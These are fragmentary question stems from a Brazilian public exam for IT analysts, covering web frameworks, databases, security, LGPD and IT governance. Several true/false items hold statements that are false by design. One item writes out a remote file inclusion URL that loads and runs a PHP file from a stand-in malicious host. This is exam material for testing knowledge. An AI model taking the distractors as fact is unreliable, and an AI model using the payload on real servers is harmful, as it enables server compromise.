Questões de Concurso Público TCE-RR 2025 para Analista Administrativo - Tecnologia da Informação, com especialidade em Desenvolvimento de Sistemas
Foram encontradas 80 questões
O recurso do Laravel descrito acima é o
1. Modelagem Lógica. 2. Modelagem Física.
( ) É dependente do SGBD. ( ) Tem foco maior nas entidades e relacionamentos. ( ) Utiliza tipos de dados genéricos ou abstratos. ( ) Considera itens de desempenho tais como índices, particionamento, etc.
A relação correta, na ordem apresentada, é
Dos SGBDs listados a seguir, o que suporta múltiplos valores no INSERT desde suas versões iniciais é o
Assinale a afirmativa correta acerca da aplicação desses controles segundo as normas mencionadas.
Sobre as funcionalidades dessa pilha, assinale a afirmativa correta.
O componente responsável por fazer a coleta de dados sobre disponibilidade e integridade de sistemas de TI em clientes em uma rede remota é o
Diante desse cenário, avalie as afirmativas a seguir e assinale (V) para a verdadeira e (F) para a falsa.
( ) Nuxt é um dos principais frameworks baseados em Angular.
( ) Uma característica do React é o emprego de JSX - extensão de sintaxe que permite escrever marcações semelhantes à HTML em um arquivo JavaScript.
( ) Mantido pelo Google, o Vue.js é baseado em TypeScript e no padrão MVC.
As afirmativas são, respectivamente,

Marque a opção que corresponde ao padrão de projeto implementado no código acima.
Esse código era executado automaticamente no navegador de qualquer funcionário que visualizasse os relatórios, redirecionando-os para sites fraudulentos.
Nesse contexto, o ataque foi identificado como
Nesse sentido, de acordo com os princípios da LGPD aplicados ao desenvolvimento de sistemas, é correto afirmar que
Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o
Em relação às ferramentas presentes na ferramenta Burp Suite, analise as afirmativas a seguir.
I. O proxy do Burp Suite pode interceptar o tráfego HTTP e HTTPS entre o cliente e o servidor, permitindo analisar e manipular requisições em tempo real; ele é essencial para identificar vulnerabilidades em parâmetros, cabeçalhos e cookies.
II. O Repeater é uma ferramenta do Burp Suite para realizar ataques automatizados, como brute force e fuzzing, permitindo testar vulnerabilidades em parâmetros de entrada.
III. O Intruder é usado para enviar requisições manualmente, permitindo ajustar parâmetros e repetir testes de vulnerabilidades com base em respostas anteriores; sua interface exibe claramente a requisição enviada e a resposta recebida, facilitando a análise e a validação de falhas.
Está correto o que se afirma em
Nesse sentido, correlacione as metodologias ágeis apresentadas a seguir com suas respectivas descrições.
1. Scrum 2. Kanban 3. XP(Extreme Programming)
( ) Método focado na gestão do fluxo contínuo de trabalho, utilizando um quadro visual para representar as etapas do trabalho, promovendo a visualização das tarefas em diferentes estágios e a limitação do trabalho em andamento.
( ) Metodologia que enfatiza a excelência técnica através da adoção de práticas específicas que visam a alta qualidade do processo de trabalho e do produto final, como revisões frequentes, feedback constante e foco na melhoria contínua do processo.
( ) Framework que define papéis e eventos específicos para a gestão do trabalho em equipe, estruturado em iterações curtas (sprints) com objetivos definidos, buscando entregas incrementais de valor e a adaptação contínua ao contexto, com foco na gestão do projeto como um todo.
Assinale a opção que indica a relação correta, na ordem apresentada.
I. Em ambientes que seguem frameworks como ITIL, práticas de compliance devem ser tratadas separadamente dos processos de gerenciamento de serviços, para evitar atrasos nas auditorias internas e externas.
II. Auditorias de TI devem ser realizadas exclusivamente para verificar a conformidade com normas e regulamentações, sem impacto direto na melhoria dos processos de gerenciamento de incidentes e mudanças.
III. A realização de auditorias sistemáticas pode reduzir falhas de conformidade ao identificar e monitorar indicadores críticos em tempo real, permitindo ações corretivas alinhadas a padrões regulatórios.
Está correto o que se afirma em
Com relação ao assunto analise as afirmativas a seguir:
I. O COBIT é um framework de governança de TI que foca no alinhamento de TI com os objetivos de negócios, garantindo a entrega de valor e a mitigação de riscos.
II. O ITIL é uma metodologia que descreve práticas de gerenciamento de serviços de TI, com ênfase na entrega eficiente e eficaz de serviços ao cliente, sem considerar a gestão de riscos.
III. O COBIT e o ITIL são frameworks complementares, ambos focados na governança de TI, sendo o COBIT mais voltado para o controle e o ITIL, para a gestão de serviços.
Está correto o que se afirma em